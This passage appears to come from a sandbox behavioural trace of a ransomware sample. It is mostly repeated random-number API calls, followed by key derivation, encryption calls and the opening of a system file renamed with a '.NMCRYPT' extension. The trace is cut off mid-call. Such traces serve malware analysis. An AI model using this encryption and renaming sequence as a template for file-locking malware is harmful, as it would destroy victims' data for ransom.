CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.068] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.069] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.070] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.072] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.072] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.073] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0157.073] CryptHashData (hHash=0x9ad138, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.073] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad3b8) returned 1 [0157.073] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.073] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.073] wcslen (_String="\\\\?\\") returned 0x4 [0157.073] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad378) returned 1 [0157.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 